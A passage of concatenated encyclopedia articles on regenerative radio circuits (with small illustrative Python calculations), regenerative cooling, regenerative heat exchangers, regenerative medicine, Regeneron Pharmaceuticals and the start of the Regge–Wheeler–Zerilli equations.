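mixed = np.cos(2 * np.pi * f_signal * t) * np.cos(2 * np.pi * f_osc * t)

spectrum = np.abs(np.fft.rfft(mixed))
freqs = np.fft.rfftfreq(len(mixed), 1 / fs)
audio_band = freqs < 20_000
audio_peak = freqs[audio_band][np.argmax(spectrum[audio_band])]
print(f"Dominant audio-range component: {audio_peak:.0f} Hz")   # ~700 Hz beat tone
```

The 700 Hz difference component is what the listener hears whenever the station is keyed on; the sum component lies far above the audio range and is removed by the audio stages.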
Demodulation of a signal in this manner, by use of a single amplifying device as oscillator and mixer simultaneously, is known as autodyne reception. [ 27 ] The term autodyne predates multigrid tubes and is not applied to use of tubes specifically designed for frequency conversion.
For the reception of single-sideband (SSB) signals, the circuit is also adjusted to oscillate as in CW reception. The tuning is adjusted until the demodulated voice is intelligible.
Regenerative receivers require fewer components than other types of receiver circuit, such as the TRF and superheterodyne . The circuit's advantage was that it got much more amplification (gain) out of the expensive vacuum tubes , thus reducing the number of tubes required and therefore the cost of a receiver. Early vacuum tubes had low gain and tended to oscillate at radio frequencies (RF). TRF receivers often required 5 or 6 tubes, each stage requiring tuning and neutralization, making the receiver cumbersome, power hungry, and hard to adjust. A regenerative receiver, by contrast, could often provide adequate reception with only one tube. In the 1930s the regenerative receiver was replaced by the superheterodyne circuit in commercial receivers due to the superheterodyne's superior performance and the falling cost of tubes. Since the advent of the transistor in 1947, the low cost of active devices has removed most of the advantage of the circuit. However, in recent years the regenerative circuit has seen a modest comeback in receivers for low-cost digital radio applications such as garage door openers , keyless locks , RFID readers and some cell phone receivers.
A disadvantage of this receiver, especially in designs that couple the detector tuned circuit to the antenna, is that the regeneration (feedback) level must be adjusted when the receiver is tuned to a different frequency. The antenna impedance varies with frequency, changing the loading of the input tuned circuit by the antenna, requiring the regeneration to be adjusted. In addition, the Q of the detector tuned circuit components vary with frequency, requiring adjustment of the regeneration control. [ 5 ] : p.189
A disadvantage of the single active device regenerative detector in autodyne operation is that the local oscillation causes the operating point to move significantly away from the ideal operating point, resulting in the detection gain being reduced. [ 24 ]
Another drawback is that when the circuit is adjusted to oscillate it can radiate a signal from its antenna, so it can cause interference to other nearby receivers. Adding an RF amplifier stage between the antenna and the regenerative detector can reduce unwanted radiation, but would add expense and complexity.
Other shortcomings of regenerative receivers are sensitive and unstable tuning. These problems have the same cause: a regenerative receiver's gain is greatest when it operates on the verge of oscillation, and in that condition the circuit behaves chaotically . [ 28 ] [ 29 ] [ 30 ] Simple regenerative receivers electrically couple the antenna to the detector tuned circuit, so the electrical characteristics of the antenna influence the resonant frequency of the detector tuned circuit. Any movement of the antenna or of large objects near it can change the tuning of the detector.
The inventor of FM radio, Edwin Armstrong , filed US patent 1113149 for the regenerative circuit in 1913, while he was a junior in college. [ 31 ] He patented the superheterodyne receiver in 1918 and the superregenerative circuit in 1922.
Lee De Forest filed US patent 1170881 in 1914 that became the cause of a contentious lawsuit with Armstrong, whose patent for the regenerative circuit had been issued in 1914. The lawsuit lasted until 1934, winding its way through the appeals process and ending up at the Supreme Court . Armstrong won the first case, lost the second, stalemated at the third, and then lost the final round at the Supreme Court. [ 32 ] [ 33 ]
At the time the regenerative receiver was introduced, vacuum tubes were expensive and consumed much power, with the added expense and encumbrance of heavy batteries. So this design, getting most gain out of one tube, filled the needs of the growing radio community and immediately thrived. Although the superheterodyne receiver is the most common receiver in use today [ citation needed ] , the regenerative radio made the most out of very few parts.
In World War II the regenerative circuit was used in some military equipment. An example is the German field radio "Torn.E.b". [ 34 ] Regenerative receivers needed far fewer tubes and less power consumption for nearly equivalent performance.
A related circuit, the superregenerative detector , found several highly important military uses in World War II, in Friend or Foe identification equipment and in the top-secret proximity fuze . An example is the miniature RK61 thyratron marketed in 1938, which was designed specifically to operate like a vacuum triode below its ignition voltage, allowing it to amplify analog signals as a self-quenching superregenerative detector in radio control receivers. [ 35 ] This was the major technical development that led to the wartime development of radio-controlled weapons and the parallel development of radio-controlled modelling as a hobby. [ 36 ]
In the 1930s, the superheterodyne design began to gradually supplant the regenerative receiver, as tubes became far less expensive. In Germany the design was still used in the millions of mass-produced German "peoples receivers" ( Volksempfänger ) and "German small receivers" (DKE, Deutscher Kleinempfänger). Even after WWII, the regenerative design was still present in early after-war German minimal designs along the lines of the "peoples receivers" and "small receivers", dictated by lack of materials. Frequently German military tubes like the "RV12P2000" were employed in such designs. There were even superheterodyne designs, which used the regenerative receiver as a combined IF and demodulator with fixed regeneration. The superregenerative design was also present in early FM broadcast receivers around 1950. Later it was almost completely phased out of mass production, remaining only in hobby kits, and some special applications, like gate openers.
The superregenerative receiver uses a second, lower-frequency oscillation (within the same stage or from a second oscillator stage) to provide single-device circuit gains of around one million. This second oscillation periodically interrupts or "quenches" the main RF oscillation. [ 37 ] Ultrasonic quench rates between 30 and 100 kHz are typical. After each quenching, the RF oscillation grows exponentially, starting from the tiny energy picked up by the antenna plus circuit noise. The amplitude reached at the end of the quench cycle (linear mode), or the time taken to reach limiting amplitude (log mode), depends on the strength of the received signal from which the exponential growth started. A low-pass filter in the audio amplifier filters the quench and RF frequencies from the output, leaving the AM modulation. This provides a crude but very effective automatic gain control (AGC).
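The relationship between the signal present at the start of a build-up interval and the detected output can be illustrated with a toy model. The numbers below (growth constant, quench timing, limiting level) are assumptions chosen only to show the behaviour, not values from any cited receiver.

```python
import math

def linear_mode_amplitude(v_start, growth_rate, build_time):
    """Amplitude at the end of one quench cycle if limiting is never reached (linear mode)."""
    return v_start * math.exp(growth_rate * build_time)

def log_mode_time_to_limit(v_start, growth_rate, v_limit):
    """Time for the oscillation to grow from v_start to the limiting amplitude (log mode)."""
    return math.log(v_limit / v_start) / growth_rate

growth_rate = 1.0e6      # 1/s, assumed net exponential growth constant of the RF oscillation
build_time = 10e-6       # s, assumed build-up interval within each quench cycle
v_limit = 1.0            # V, assumed limiting amplitude

for v_start in (1e-6, 2e-6, 4e-6):   # microvolt-level starting signals (antenna pickup + noise)
    amp = linear_mode_amplitude(v_start, growth_rate, build_time)
    t_lim = log_mode_time_to_limit(v_start, growth_rate, v_limit)
    print(f"start {v_start*1e6:.0f} uV -> end-of-cycle {amp*1e3:5.1f} mV, "
          f"time to limit {t_lim*1e6:4.1f} us")
```

In this toy model the end-of-cycle amplitude in linear mode is simply proportional to the starting signal, while in log mode the time to reach limiting varies only logarithmically with signal strength, which is the source of the AGC-like compression described above.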
Superregenerative detectors work well for AM and can also be used for wide-band signals such as FM, where they perform "slope detection". Regenerative detectors work well for narrow-band signals, especially for CW and SSB, which need a heterodyne oscillator or BFO. A superregenerative detector has no usable heterodyne oscillator (even though the superregen always self-oscillates), so CW (Morse code) and SSB (single-sideband) signals cannot be received properly.
Superregeneration is most valuable above 27 MHz, and for signals where broad tuning is desirable. The superregen uses many fewer components for nearly the same sensitivity as more complex designs. It is easily possible to build superregen receivers which operate at microwatt power levels, in the 30 to 6,000 MHz range. It removes the need for the operator to manually adjust regeneration level to just below the point of oscillation - the circuit automatically is taken out of oscillation periodically, but with the disadvantage that small amounts of interference may be a problem for others. These are ideal for remote-sensing applications or where long battery life is important. For many years, superregenerative circuits have been used for commercial products such as garage-door openers, radar detectors, microwatt RF data links, and very low cost walkie-talkies.
Because superregenerative detectors tend to receive the strongest signal and ignore other signals in the nearby spectrum, the superregen works best with bands that are relatively free of interfering signals. By the Nyquist theorem , its quenching frequency must be at least twice the signal bandwidth. But quenching with overtones acts further as a heterodyne receiver, mixing additional unwanted signals from those bands into the working frequency. Thus the overall bandwidth of the superregenerator cannot be less than 4 times the quench frequency, assuming the quenching oscillator produces an ideal sine wave. | https://en.wikipedia.org/wiki/Regenerative_circuit
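A worked example of these constraints, with an assumed signal bandwidth (the figures are illustrative, not taken from the cited sources):

```python
signal_bandwidth = 10_000                    # Hz, assumed modulation bandwidth of the wanted signal
min_quench = 2 * signal_bandwidth            # sampling-theorem lower bound on the quench frequency
min_rx_bandwidth = 4 * min_quench            # minimum overall receiver bandwidth, ideal sine quench

print(f"Quench frequency   >= {min_quench / 1e3:.0f} kHz")
print(f"Receiver bandwidth >= {min_rx_bandwidth / 1e3:.0f} kHz")
# A 10 kHz-wide signal therefore forces at least a 20 kHz quench rate and roughly an
# 80 kHz-wide detector response, which is why superregens suit uncrowded bands.
```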
Regenerative cooling is a method of cooling gases in which compressed gas is cooled by allowing it to expand and thereby take heat from the surroundings. The cooled expanded gas then passes through a heat exchanger where it cools the incoming compressed gas. [ 1 ]
In 1857, Siemens introduced the regenerative cooling concept with the Siemens cycle . [ 2 ] In 1895, William Hampson in England [ 3 ] and Carl von Linde in Germany [ 4 ] independently developed and patented the Hampson–Linde cycle to liquefy air using the Joule–Thomson expansion process and regenerative cooling. [ 5 ] On 10 May 1898, James Dewar used regenerative cooling to become the first to statically liquefy hydrogen . | https://en.wikipedia.org/wiki/Regenerative_cooling |
A regenerative heat exchanger , or more commonly a regenerator , is a type of heat exchanger where heat from the hot fluid is intermittently stored in a thermal storage medium before it is transferred to the cold fluid. To accomplish this the hot fluid is brought into contact with the heat storage medium, then the fluid is displaced with the cold fluid, which absorbs the heat. [ 1 ]
In regenerative heat exchangers, the fluid on either side of the heat exchanger can be the same fluid. The fluid may go through an external processing step, and then it is flowed back through the heat exchanger in the opposite direction for further processing. Usually the application will use this process cyclically or repetitively.
Regenerative heating was one of the most important technologies developed during the Industrial Revolution when it was used in the hot blast process on blast furnaces . [ 2 ] It was later used in glass melting furnaces and steel making, to increase the efficiency of open hearth furnaces , and in high pressure boilers and chemical and other applications, where it continues to be important today.
The first regenerator was invented by Rev. Robert Stirling in 1816, and is also found as a component of some examples of his Stirling engine . The simplest Stirling engines, including most models, use the walls of the cylinder and displacer as a rudimentary regenerator, which is simpler and cheaper to construct but far less efficient.
Later applications included the blast furnace process known as hot blast and the open hearth furnace also called the Siemens regenerative furnace (which was used for making glass), where the hot exhaust gases from combustion are passed through firebrick regenerative chambers, which are thus heated. The flow is then reversed, so that the heated bricks preheat the fuel.
Edward Alfred Cowper applied the regeneration principle to blast furnaces, in the form of the "Cowper stove", patented in 1857. [ 3 ] This is almost invariably used with blast furnaces to this day.
Regenerators exchange heat from one process fluid to an intermediate solid heat storage medium, then that medium exchanges heat with a second process fluid flow. The two flows are either separated in time, alternately circulating through the storage medium, or are separated in space and the heat storage medium is moved between the two flows.
In rotary regenerators , or thermal wheels , the heat storage "matrix" takes the form of a wheel or drum that rotates continuously through two counter-flowing streams of fluid. In this way, the two streams are mostly separated. Only one stream flows through each section of the matrix at a time; however, over the course of a rotation, both streams eventually flow through all sections of the matrix in succession. The heat storage medium can be a relatively fine-grained set of metal plates or wire mesh, made of a resistant alloy or coated to resist chemical attack by the process fluids, or made of ceramics for high-temperature applications. A large amount of heat transfer area can be provided in each unit volume of a rotary regenerator compared to a shell-and-tube heat exchanger: up to 1000 square feet of surface can be contained in each cubic foot of regenerator matrix, compared to about 30 square feet per cubic foot of a shell-and-tube exchanger. [ 4 ]
Each portion of the matrix will be nearly isothermal , since the rotation is perpendicular to both the temperature gradient and the flow direction, and not through them. The two fluid streams flow counter-current. The fluid temperatures vary across the flow area; however, the local stream temperatures are not a function of time. The seals between the two streams are not perfect, so some cross contamination will occur. The allowable pressure level of a rotary regenerator is relatively low compared to that of other heat exchangers.
In a fixed matrix regenerator , a single fluid stream has cyclical, reversible flow; it is said to flow "counter-current". This regenerator may be part of a valveless system, such as a Stirling engine . In another configuration, the fluid is ducted through valves to different matrices in alternate operating periods resulting in outlet temperatures that vary with time. For example, a blast furnace may have several "stoves" or "checkers" full of refractory fire brick. The hot gas from the furnace is ducted through the brickwork for some interval, say one hour, until the brick reaches a high temperature. Valves then operate and switch the cold intake air through the brick, recovering the heat for use in the furnace. Practical installations will have multiple stoves and arrangements of valves to gradually transfer flow between a "hot" stove and an adjacent "cold" stove, so that the variations in the outlet air temperature are reduced. [ 5 ]
Another type of regenerator is called a micro scale regenerative heat exchanger . It has a multilayer grating structure in which each layer is offset from the adjacent layer by half a cell which has an opening along both axes perpendicular to the flow axis. Each layer is a composite structure of two sublayers, one of a high thermal conductivity material and another of a low thermal conductivity material. When a hot fluid flows through the cell, heat from the fluid is transferred to the cell walls, and stored there. When the fluid flow reverses direction, heat is transferred from the cell walls back to the fluid.
A third type of regenerator is called a " Rothemühle " regenerator. This type has a fixed matrix in a disk shape, and streams of fluid are ducted through rotating hoods. The Rothemühle regenerator is used as an air preheater in power generating plants. The thermal design of this regenerator is the same as of other types of regenerators. [ citation needed ]
The nose and throat work as regenerative heat exchangers during breathing. The cooler air coming in is warmed, so that it reaches the lungs as warm air. On the way back out, this warmed air deposits much of its heat back onto the sides of the nasal passages, so that these passages are then ready to warm the next batch of air coming in. Some animals, including humans, have curled sheets of bone inside the nose called nasal turbinates to increase the surface area for heat exchange. [ citation needed ]
Regenerative heat exchangers are made up of materials with high volumetric heat capacity and low thermal conductivity in the longitudinal (flow) direction. At cryogenic (very low) temperatures around 20 K , the specific heat of metals is low, and so a regenerator must be larger for a given heat load. [ citation needed ]
The advantage of a regenerator over a recuperating (counter-flowing) heat exchanger is that it has a much higher surface area for a given volume, which provides a reduced exchanger volume for a given energy density, effectiveness and pressure drop. This makes a regenerator more economical in terms of materials and manufacturing, compared to an equivalent recuperator. [ citation needed ]
The design of inlet and outlet headers used to distribute hot and cold fluids in the matrix is much simpler in counter flow regenerators than recuperators. The reason behind this is that both streams flow in different sections for a rotary regenerator and one fluid enters and leaves one matrix at a time in a fixed-matrix regenerator. Furthermore, flow sectors for hot and cold fluids in rotary regenerators can be designed to optimize pressure drop in the fluids. The matrix surfaces of regenerators also have self-cleaning characteristics, reducing fluid-side fouling and corrosion. Finally properties such as small surface density and counter-flow arrangement of regenerators make it ideal for gas-gas heat exchange applications requiring effectiveness exceeding 85%. The heat transfer coefficient is much lower for gases than for liquids, thus the enormous surface area in a regenerator greatly increases heat transfer. [ citation needed ]
The major disadvantage of rotary and fixed-matrix regenerators is that there is always some mixing of the fluid streams, and they can not be completely separated. There is an unavoidable carryover of a small fraction of one fluid stream into the other. In the rotary regenerator, the carryover fluid is trapped inside the radial seal and in the matrix, and in a fixed-matrix regenerator, the carryover fluid is the fluid that remains in the void volume of the matrix. This small fraction will mix with the other stream in the following half-cycle. Therefore, rotary and fixed-matrix regenerators are only used when it is acceptable for the two fluid streams to be mixed. Mixed flow is common for gas-to-gas heat and/or energy transfer applications, and less common in liquid or phase-changing fluids since fluid contamination is often prohibited with liquid flows. [ citation needed ]
The constant alternation of heating and cooling that takes place in regenerative heat exchangers puts a lot of stress on the components of the heat exchanger, which can cause cracking or breakdown of materials. [ citation needed ] | https://en.wikipedia.org/wiki/Regenerative_heat_exchanger |
Regenerative medicine deals with the "process of replacing, engineering or regenerating human or animal cells, tissues or organs to restore or establish normal function". [ 1 ] This field holds the promise of engineering damaged tissues and organs by stimulating the body's own repair mechanisms to functionally heal previously irreparable tissues or organs. [ 2 ]
Regenerative medicine also includes the possibility of growing tissues and organs in the laboratory and implanting them when the body cannot heal itself. When the cell source for a regenerated organ is derived from the patient's own tissue or cells, [ 3 ] the challenge of organ transplant rejection via immunological mismatch is circumvented. [ 4 ] [ 5 ] [ 6 ] This approach could alleviate the problem of the shortage of organs available for donation.
Some of the biomedical approaches within the field of regenerative medicine may involve the use of stem cells . [ 7 ] Examples include the injection of stem cells or progenitor cells obtained through directed differentiation ( cell therapies ); the induction of regeneration by biologically active molecules administered alone or as a secretion by infused cells (immunomodulation therapy); and transplantation of in vitro grown organs and tissues ( tissue engineering ). [ 8 ] [ 9 ]
The ancient Greeks postulated as early as the 700s BC whether parts of the body could be regenerated. [ 10 ] Skin grafting, invented in the late 19th century, can be thought of as the earliest major attempt to recreate bodily tissue in order to restore structure and function. [ 11 ] Advances in transplanting body parts in the 20th century further pushed the theory that body parts could regenerate and grow new cells. These advances led to tissue engineering, and from this field the study of regenerative medicine expanded and began to take hold. [ 10 ] It began with cellular therapy, which led to the stem cell research that is widely conducted today. [ 12 ]
The first cell therapies were intended to slow the aging process. They began in the 1930s with Paul Niehans, a Swiss doctor known to have treated famous historical figures such as Pope Pius XII, Charlie Chaplin, and King Ibn Saud of Saudi Arabia. Niehans would inject cells of young animals (usually lambs or calves) into his patients in an attempt to rejuvenate them. [ 13 ] [ 14 ] In 1956, a more sophisticated process was created to treat leukemia by transplanting bone marrow from a healthy person into a patient with leukemia. This worked largely because the donor and recipient in this case were identical twins. Nowadays, bone marrow can be taken from donors who are sufficiently similar to the patient to prevent rejection. [ 15 ]
The term "regenerative medicine" was first used in a 1992 article on hospital administration by Leland Kaiser. Kaiser's paper closes with a series of short paragraphs on future technologies that will impact hospitals. One paragraph had "Regenerative Medicine" as a bold print title and stated, "A new branch of medicine will develop that attempts to change the course of chronic disease and in many instances will regenerate tired and failing organ systems." [ 16 ] [ 17 ]
The term was brought into the popular culture in 1999 by William A. Haseltine when he coined the term during a conference on Lake Como, to describe interventions that restore to normal function that which is damaged by disease, injured by trauma, or worn by time. [ 18 ] Haseltine was briefed on the project to isolate human embryonic stem cells and embryonic germ cells at Geron Corporation in collaboration with researchers at the University of Wisconsin–Madison and Johns Hopkins School of Medicine . He recognized that these cells' unique ability to differentiate into all the cell types of the human body ( pluripotency ) had the potential to develop into a new kind of regenerative therapy. [ 19 ] [ 20 ] Explaining the new class of therapies that such cells could enable, he used the term "regenerative medicine" in the way that it is used today: "an approach to therapy that ... employs human genes, proteins and cells to re-grow, restore or provide mechanical replacements for tissues that have been injured by trauma, damaged by disease or worn by time" and "offers the prospect of curing diseases that cannot be treated effectively today, including those related to aging". [ 21 ] [ 22 ]
Later, Haseltine would go on to explain that regenerative medicine acknowledges the reality that most people, regardless of which illness they have or which treatment they require, simply want to be restored to normal health. Designed to be applied broadly, the original definition includes cell and stem cell therapies, gene therapy, tissue engineering, genomic medicine, personalized medicine, biomechanical prosthetics, recombinant proteins, and antibody treatments. It also includes more familiar chemical pharmacopeia—in short, any intervention that restores a person to normal health. In addition to functioning as shorthand for a wide range of technologies and treatments, the term "regenerative medicine" is also patient friendly. It solves the problem that confusing or intimidating language discourages patients.
The term regenerative medicine is increasingly conflated with research on stem cell therapies. Some academic programs and departments retain the original broader definition while others use it to describe work on stem cell research. [ 23 ]
From 1995 to 1998 Michael D. West , PhD, organized and managed the research between Geron Corporation and its academic collaborators James Thomson at the University of Wisconsin–Madison and John Gearhart of Johns Hopkins University that led to the first isolation of human embryonic stem and human embryonic germ cells, respectively. [ 24 ]
In March 2000, Haseltine, Antony Atala , M.D., Michael D. West, Ph.D., and other leading researchers founded E-Biomed: The Journal of Regenerative Medicine . [ 25 ] The peer-reviewed journal facilitated discourse around regenerative medicine by publishing innovative research on stem cell therapies, gene therapies, tissue engineering, and biomechanical prosthetics. The Society for Regenerative Medicine, later renamed the Regenerative Medicine and Stem Cell Biology Society, served a similar purpose, creating a community of like-minded experts from around the world. [ 26 ]
In June 2008, at the Hospital Clínic de Barcelona, Professor Paolo Macchiarini and his team, of the University of Barcelona , performed the first tissue engineered trachea (wind pipe) transplantation. Adult stem cells were extracted from the patient's bone marrow, grown into a large population, and matured into cartilage cells, or chondrocytes , using an adaptive method originally devised for treating osteoarthritis. The team then seeded the newly grown chondrocytes, as well as epithelial cells, into a decellularised (free of donor cells) tracheal segment that was donated from a 51-year-old transplant donor who had died of cerebral hemorrhage. After four days of seeding, the graft was used to replace the patient's left main bronchus. After one month, a biopsy elicited local bleeding, indicating that the blood vessels had already grown back successfully. [ 27 ] [ 28 ]
In 2009, the SENS Foundation was launched, with its stated aim as "the application of regenerative medicine – defined to include the repair of living cells and extracellular material in situ – to the diseases and disabilities of ageing". [ 29 ] In 2012, Professor Paolo Macchiarini and his team improved upon the 2008 implant by transplanting a laboratory-made trachea seeded with the patient's own cells. [ 30 ]
On September 12, 2014, surgeons at the Institute of Biomedical Research and Innovation Hospital in Kobe, Japan, transplanted a 1.3 by 3.0 millimeter sheet of retinal pigment epithelium cells, which were differentiated from iPS cells through directed differentiation , into an eye of an elderly woman, who suffers from age-related macular degeneration . [ 31 ]
In 2016, Paolo Macchiarini was dismissed by the Karolinska Institute in Sweden over falsified test results and misconduct. [ 32 ] The television documentary series Experimenten , aired on Swedish Television, detailed the falsified results and deceptions. [ 33 ]
Widespread interest and funding for research on regenerative medicine has prompted institutions in the United States and around the world to establish departments and research institutes that specialize in regenerative medicine including: The Department of Rehabilitation and Regenerative Medicine at Columbia University , the Institute for Stem Cell Biology and Regenerative Medicine at Stanford University , the Center for Regenerative and Nanomedicine at Northwestern University , the Wake Forest Institute for Regenerative Medicine, and the British Heart Foundation Centers of Regenerative Medicine at the University of Oxford . [ 34 ] [ 35 ] [ 36 ] [ 37 ] In China, institutes dedicated to regenerative medicine are run by the Chinese Academy of Sciences , Tsinghua University , and the Chinese University of Hong Kong , among others. [ 38 ] [ 39 ] [ 40 ]
Regenerative medicine has been studied by dentists to find ways in which damaged teeth can be repaired and restored to their natural structure and function. [ 42 ] Dental tissues are often damaged by tooth decay and are usually deemed irreplaceable except by synthetic or metal dental fillings or crowns, which require further damage to the tooth through drilling in order to prevent the loss of the entire tooth.
Researchers from King's College London have reported that a drug called Tideglusib is able to stimulate regrowth of dentin, the second layer of the tooth beneath the enamel, which encases and protects the pulp (often referred to as the nerve). [ 43 ]
Animal studies conducted on mice in Japan in 2007 showed great promise in regenerating an entire tooth. Some mice had a tooth extracted, and cells from bioengineered tooth germs were implanted into them and allowed to grow. The result was perfectly functioning and healthy teeth, complete with all three layers as well as roots. These teeth also had the necessary ligaments to stay rooted in their sockets and allow for natural shifting. They contrast with traditional dental implants, which are restricted to one spot as they are drilled into the jawbone. [ 44 ] [ 45 ]
A person's baby teeth are known to contain stem cells that can be used for regeneration of the dental pulp after a root canal treatment or injury. These cells can also be used to repair damage from periodontitis, an advanced form of gum disease that causes bone loss and severe gum recession. Research is still being done to see if these stem cells are viable enough to grow into completely new teeth. Some parents even opt to keep their children's baby teeth in special storage with the thought that, when older, the children could use the stem cells within them to treat a condition. [ 46 ] [ 47 ]
Extracellular matrix materials are commercially available and are used in reconstructive surgery , treatment of chronic wounds , and some orthopedic surgeries ; as of January 2017 clinical studies were under way to use them in heart surgery to try to repair damaged heart tissue. [ 48 ] [ 49 ]
The use of fish skin with its natural constituent of omega 3 , has been developed by an Icelandic company Kereceis . [ 50 ] Omega 3 is a natural anti-inflammatory , and the fish skin material acts as a scaffold for cell regeneration. [ 51 ] [ 52 ] In 2016 their product Omega3 Wound was approved by the FDA for the treatment of chronic wounds and burns. [ 51 ] In 2021 the FDA gave approval for Omega3 Surgibind to be used in surgical applications including plastic surgery. [ 53 ]
Though uses of cord blood beyond blood and immunological disorders is speculative, some research has been done in other areas. [ 54 ] Any such potential beyond blood and immunological uses is limited by the fact that cord cells are hematopoietic stem cells (which can differentiate only into blood cells), and not pluripotent stem cells (such as embryonic stem cells , which can differentiate into any type of tissue). Cord blood has been studied as a treatment for diabetes. [ 55 ] However, apart from blood disorders, the use of cord blood for other diseases is not a routine clinical modality and remains a major challenge for the stem cell community. [ 54 ] [ 55 ]
Along with cord blood, Wharton's jelly and the cord lining have been explored as sources for mesenchymal stem cells (MSC), [ 56 ] and as of 2015 had been studied in vitro, in animal models, and in early stage clinical trials for cardiovascular diseases, [ 57 ] as well as neurological deficits, liver diseases, immune system diseases, diabetes, lung injury, kidney injury, and leukemia. [ 58 ] | https://en.wikipedia.org/wiki/Regenerative_medicine |
Regeneron Pharmaceuticals, Inc. is an American biotechnology company headquartered in Westchester County, New York . The company was founded in 1988. [ 2 ] Originally focused on neurotrophic factors and their regenerative capabilities, which gave rise to its present name, the company has since expanded operations into the study of both cytokine and tyrosine kinase receptors, work that led to its first product, a VEGF -trap.
The company was founded by CEO Leonard Schleifer and scientist George Yancopoulos in 1988. [ 3 ]
Regeneron has developed aflibercept , a VEGF inhibitor, and rilonacept , an interleukin-1 blocker. VEGF is a protein that normally stimulates the growth of blood vessels, and interleukin-1 is a protein that is normally involved in inflammation. [ citation needed ]
On March 26, 2012, Bloomberg announced that Sanofi and Regeneron were in development of a new drug that would help reduce cholesterol up to 72% more than its competitors. The new drug would target the PCSK9 gene. [ 4 ]
In July 2015, the company announced a new global collaboration with Sanofi to discover, develop, and commercialize new immuno-oncology drugs, which could generate more than $2 billion for Regeneron, [ 5 ] with $640 million upfront, $750 million for proof-of-concept data, and $650 million from the development of REGN2810 . [ 6 ] REGN2810 was later named cemiplimab. In 2019, Regeneron Pharmaceuticals was announced the 7th best publicly listed company of the 2010s, with a total return of 1,457%. [ 7 ] Regeneron Pharmaceuticals was home to the two highest-paid pharmaceutical executives as of 2020. [ 8 ]
In October 2017, Regeneron made a deal with the Biomedical Advanced Research and Development Authority (BARDA) that the U.S. government would fund 80% of the costs for Regeneron to develop and manufacture antibody-based medications, which subsequently, in 2020, included their COVID-19 treatments, and Regeneron would retain the right to set prices and control production. [ 9 ] This deal was criticized in The New York Times . [ 8 ] Such deals are not unusual for routine drug development in the American pharmaceutical market.
In 2019, the company was added to the Dow Jones Sustainability World Index . [ 10 ]
In May 2020, Regeneron announced it would repurchase approx. 19.2 million of its shares for around $5 billion, held directly by Sanofi. Prior to the transaction, Sanofi held 23.2 million Regeneron shares. [ 11 ] [ 12 ]
In April 2022, the business announced it would acquire Checkmate Pharmaceuticals for around $250 million, enhancing its number of immuno-oncology drugs. [ 13 ]
In August 2023, Regeneron announced it would acquire Decibel Therapeutics. [ 14 ]
In December 2023, Regeneron acquired an Avon Products property in Suffern, New York , to be used for cold storage and research and development laboratories. [ 15 ]
In April 2024, the company acquired 2seventy Bio . [ 16 ]
In May 2025, the company was awarded $135.6 million in compensatory damages and $271.2 million in punitive damages in the United States District Court for the District of Delaware in a victorious antitrust case filed against Amgen . Regeneron alleged Amgen employed anticompetitive practices to exclude Praluent from the market and elevate Amgen's rival Repatha . [ 17 ]
As of May 2025, the company is to buy 23andMe for $256 million. [ 18 ] [ 19 ]
On February 4, 2020, the U.S. Department of Health and Human Services , which already worked with Regeneron, announced that Regeneron would pursue monoclonal antibodies to fight COVID-19. [ 20 ]
In July 2020, under Operation Warp Speed , Regeneron was awarded a $450 million government contract to manufacture and supply its experimental treatment REGN-COV2 , an artificial "antibody cocktail" which was then undergoing clinical trials for its potential both to treat people with COVID-19 and to prevent SARS-CoV-2 coronavirus infection. [ 21 ] [ 22 ] [ 23 ] The $450 million came from the Biomedical Advanced Research and Development Authority (BARDA), the DoD Joint Program Executive Office for Chemical, Biological, Radiological and Nuclear Defense, and Army Contracting Command . Regeneron expected to produce 70,000–300,000 treatment doses or 420,000–1,300,000 prevention doses. "By funding this manufacturing effort, the federal government will own the doses expected to result from the demonstration project," the government said in its July 7 news release. [ 24 ] Regeneron similarly said in its own news release that same day that "the government has committed to making doses from these lots available to the American people at no cost and would be responsible for their distribution," noting that this depended on the government granting emergency use authorization or product approval. [ 25 ] California based laboratory, FOMAT, is part of the clinical investigation through their doctors Augusto and Nicholas Focil. [ 26 ]
In October 2020 when U.S. President Donald Trump was infected with COVID-19 and taken to Walter Reed National Military Medical Center in Bethesda, Maryland , he was administered REGN-COV2 . [ 27 ] His doctors obtained it from Regeneron via a compassionate use request (as clinical trials had not yet been completed and the drug had not yet been approved by the US Food and Drug Administration (FDA)). [ 28 ] On October 7, Trump posted a five-minute video to Twitter reasserting that this drug should be "free." [ 29 ] That same day, Regeneron filed with the FDA for emergency use authorization. In the filing, it specified that it currently had 50,000 doses and that it expected to reach a total of 300,000 doses "within the next few months." [ 30 ] The FDA granted approval for emergency use authorization in November 2020. [ 31 ]
Trap Fusion Proteins: Regeneron's novel and patented Trap technology creates high-affinity product candidates for many types of signaling molecules, including growth factors and cytokines. The Trap technology involves fusing two distinct fully human receptor components and a fully human immunoglobulin-G constant region. [ citation needed ]
Fully Human Monoclonal Antibodies: Regeneron has developed a suite (VelociSuite) of patented technologies, including VelocImmune and VelociMab, that allow Regeneron scientists to determine the best targets for therapeutic intervention and rapidly generate high-quality, fully human antibody drug candidates addressing these targets. [ 43 ] : 255–258
The founders Leonard Schleifer and George Yancopoulos are reported to hold $1.3 billion and $900 million in company stock, respectively. Both are from Queens, New York . [ 3 ] Schleifer was formerly a professor of medicine at Weill Cornell Medical School . Yancopoulos was a post-doctoral fellow, and MD/PhD student at Columbia University . Yancopoulos was involved in each drug's development. [ 3 ] | https://en.wikipedia.org/wiki/Regeneron_Pharmaceuticals |
In general relativity , the Regge–Wheeler–Zerilli equations are a pair of equations that describe gravitational perturbations of a Schwarzschild black hole , named after Tullio Regge , John Archibald Wheeler and Frank J. Zerilli. [ 1 ] [ 2 ] The perturbations of a Schwarzschild metric are classified into two types, namely axial and polar perturbations, a terminology introduced by Subrahmanyan Chandrasekhar . Axial perturbations induce frame dragging by imparting rotation to the black hole and change sign when the azimuthal direction is reversed, whereas polar perturbations do not impart rotation and do not change sign under reversal of the azimuthal direction. The equation for axial perturbations is called the Regge–Wheeler equation and the equation governing polar perturbations is called the Zerilli equation .
When assuming a harmonic time dependence, the equations take the same form as the one-dimensional Schrödinger equation . The equations read as [ 3 ]
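In the standard Schrödinger-like form (with the potentials V ± {\displaystyle V^{\pm }} defined below), the pair reads {\displaystyle {\frac {d^{2}Z^{\pm }}{dr_{*}^{2}}}+\left(\sigma ^{2}-V^{\pm }\right)Z^{\pm }=0,}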
